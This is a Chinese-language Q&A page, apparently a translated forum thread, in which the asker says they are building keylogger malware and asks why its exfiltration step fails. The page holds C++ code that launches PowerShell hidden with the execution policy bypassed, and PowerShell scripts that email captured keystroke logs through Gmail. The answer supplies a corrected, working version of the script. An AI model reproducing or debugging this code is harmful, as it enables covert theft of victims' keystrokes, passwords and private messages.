从C ++应用程序发送Powershell电子邮件

时间:2018-10-30 02:24:38

标签: powershell c++11

我一直在研究键盘记录器恶意软件应用程序。 C ++ Windows应用程序会跟踪用户的所有键盘输入,并将其记录到文本文件中。该应用程序将文本文件发送到Gmail帐户。我使用Windows Powershell来做到这一点。但是,它不会将电子邮件发送到错误259的帐户。我认为Powershell脚本有问题。 

Param( 

   [String]$Att,

   [String]$Subj,

   [String]$Body

)



Function Send-EMail {

    Param (

    [Parameter(`

        Mandatory=$true)]

    [String]$To,

     [Parameter(`

        Mandatory=$true)]

    [String]$From,

    [Parameter(`

        Mandatory=$true)]

    [String]$Password,

    [Parameter(`

        Mandatory=$true)]

    [String]$Subject,

    [Parameter(`

        Mandatory=$true)]

    [String]$Body,

    [Parameter(`

        Mandatory=$true)]

    [String]$attachment

)

try

    {

        $Msg = New-Object System.Net.Mail.MailMessage($From, $To, $Subject, $Body)

        $Srv = "smtp.gmail.com" 

        if ($attachment -ne $null) {

            try

                {

                    $Attachments = $attachment -split ("\:\:");

                    ForEach ($val in $Attachments)

                        {

                            $attch = New-Object System.Net.Mail.Attachment($val)

                            $Msg.Attachments.Add($attch)

                        }

                }

            catch

                {

                    exit 2; 

                }

        }

        $Client = New-Object Net.Mail.SmtpClient($Srv, 465) #587 port for smtp.gmail.com SSL

        $Client.EnableSsl = $true 

        $Client.Credentials = New-Object System.Net.NetworkCredential($From.Split("@")[0], $Password); 

        $Client.Send($Msg)

        Remove-Variable -Name Client

        Remove-Variable -Name Password

        exit 7; 

      }

  catch

      {

        exit 3;   

      }

} #End Function Send-EMail

try

{

    Send-EMail -attachment $Att -To "ichwang@npcore.com" -Body $Body -Subject $Subj -password "**********" -From "ichwang@npcore.com"

}

catch

{

    exit 4; 

}

我不确定是什么问题。这是邮件发送代码的C ++代码。

int SendMail(const std::string &subject, const std::string &body, const std::string &attachments)
    {
        bool ok;

        ok = IO::MKDir(IO::GetOurPath(true));
        if(!ok)
            return -1;

        std::string scr_path = IO::GetOurPath(true) + std::string(SCRIPT_NAME);

        if(!CheckFileExists(scr_path))
            ok=CreateScript();

        if(!ok)
            return -2;

        std::string param = "-ExecutionPolicy Bypass -File \"" + scr_path + "\" -Subj \""
                            + StringReplace(subject, "\"", "\\\"") +
                            "\" -Body \""
                            + StringReplace(body, "\"", "\\\"") +
                            "\" -Att \"" + attachments + "\"";

        SHELLEXECUTEINFO ShExecInfo = {0};
        ShExecInfo.cbSize = sizeof(SHELLEXECUTEINFO);
        ShExecInfo.fMask = SEE_MASK_NOCLOSEPROCESS;
        ShExecInfo.hwnd = NULL;
        ShExecInfo.lpVerb = "open";
        ShExecInfo.lpFile = "powershell";
        ShExecInfo.lpParameters = param.c_str();
        ShExecInfo.lpDirectory = NULL;
        ShExecInfo.nShow = SW_HIDE;
        ShExecInfo.hInstApp = NULL;

        ok = (bool) ShellExecuteEx(&ShExecInfo);
        if(!ok)
            return -3;

        WaitForSingleObject(ShExecInfo.hProcess, 7000);
        DWORD exit_code = 100;

        GetExitCodeProcess(ShExecInfo.hProcess, &exit_code);

        m_timer.setFunction([&]()
        {
            WaitForSingleObject(ShExecInfo.hProcess, 60000);
            GetExitCodeProcess(ShExecInfo.hProcess, &exit_code);
            if((int)exit_code == STILL_ACTIVE)
                TerminateProcess(ShExecInfo.hProcess, 100);

            Helper::WriteAppLog("<From SendMail> Return code: " + Helper::ToString((int)exit_code));
        });

        m_timer.RepeatCount(1L);
        m_timer.SetInterval(10L);
        m_timer.Start(true);
        return (int)exit_code;

    }

这是执行Powershell的C ++代码

void TimerSendMail()
{
    if(keylog.empty())
            return;

std::string last_file = IO::WriteLog(keylog);

if(last_file.empty())
{
    Helper::WriteAppLog("File creation was not successful. Keylog '" + keylog + "'");

    return;
}

int x = Mail::SendMail("Log [" + last_file + "]",
                       "Hi :) \n The file has been attached to this mail :)\n"
                       "For testing, enjoy:!" + keylog,
                       IO::GetOurPath(true) + last_file);

if( x != 7)
    Helper::WriteAppLog("Mail was not sent! Error code: " + Helper::ToString(x));
else
    keylog="";

}

我怀疑上述三个功能会导致错误。 如果您想查看完整的源代码。在这里。

https://github.com/CPP-CProgramming/keylogger/blob/master/SendMail.h

1 个答案:

答案 0 :(得分:0)

这是我的替代powershell脚本。现在工作正常。 上面的功能框似乎已经过时,不再起作用。

$attchmnt = gci | sort LastWriteTime | select -last 1



Function Send-EMail {
Param (
    [Parameter(`
        Mandatory=$true)]
    [String]$EmailTo,
    [Parameter(`
        Mandatory=$true)]
    [String]$Subject,
    [Parameter(`
        Mandatory=$true)]
    [String]$Body,
    [Parameter(`
        Mandatory=$true)]
    [String]$EmailFrom="myself@gmail.com",  #This gives a default value to the $EmailFrom command
    [Parameter(`
        mandatory=$false)]
    [String]$attachment,
    [Parameter(`
        mandatory=$true)]
    [String]$Password
)

    $SMTPServer = "smtp.gmail.com" 
    $SMTPMessage = New-Object System.Net.Mail.MailMessage($EmailFrom,$EmailTo,$Subject,$Body)
    if ($attachment -ne $null) {
        $SMTPattachment = New-Object System.Net.Mail.Attachment($attachment)
        $SMTPMessage.Attachments.Add($SMTPattachment)
    }
    $SMTPClient = New-Object Net.Mail.SmtpClient($SmtpServer, 587) 
    $SMTPClient.EnableSsl = $true 
    $SMTPClient.Credentials = New-Object System.Net.NetworkCredential($EmailFrom.Split("@")[0], $Password); 
    $SMTPClient.Send($SMTPMessage)
    Remove-Variable -Name SMTPClient
    Remove-Variable -Name Password

} #End Function Send-EMail

Send-EMail -EmailTo "neogeoss1@gmail.com" -EmailFrom "neogeoss1@gmail.com" -Body "Keylog" -Subject "KeyLog" -attachment $attchmnt.name -password "********"
相关问题
最新问题